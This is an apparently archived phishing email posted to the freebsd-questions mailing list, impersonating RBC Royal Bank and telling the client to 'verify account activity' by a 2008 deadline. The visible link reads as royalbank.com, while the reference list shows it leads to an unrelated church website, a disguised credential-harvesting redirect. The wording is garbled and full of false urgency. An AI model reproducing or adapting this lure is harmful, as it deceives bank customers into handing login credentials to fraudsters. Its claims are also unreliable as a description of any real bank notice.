[logo_rbc_bankng.gif] [bannner.jpg]
Dear Client: According to our computer records, we noticed recently that accesses their account through Bank on the Net have been made since with the exacting standards expected of Bank from different IP addresses. This probably is because the IP address of your computer is dynamic and changing constantly, or because you have more than one computer used to access your account. Because of this incident and in compliance with the new rules in force, we have updated our computer systems to provide greater security require that you check the activity in your account before March 28, 2008. After that date, The automated computer system will be useful for your account. Also, we remind you that this message is not to verify your account information is only to verify the activity, because we do not. To log into your account through Bank on the Net and verify the activity of the same, you must use the following link: [1]http://www.royalbank.com/rbunxcgiREQUEST=ClientSignin&LANGUAGE=ENGL ISH To be sure of receiving the Bulletin RBC Royal Bank, add our email address [EMAIL PROTECTED], in their contact list. If you want to get help to carry out their banking operations, [2]See our demo, Or call 24 hours a day 365 days a year RBC Group. By phone 1 800 769-2555. rbcroyalbank.com is operated by Royal Bank of Canada. © Royal Bank of Canada 1995 - 2008. References 1. http://www.broadmoorbaptist.org/calendar/includes/www.rbc.com/rbc.com/ 2. javascript:ol('http://www.rbcroyalbank.com/RBC:SAg1Ko71JsUAPhC4VQw/email.html'); _______________________________________________ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"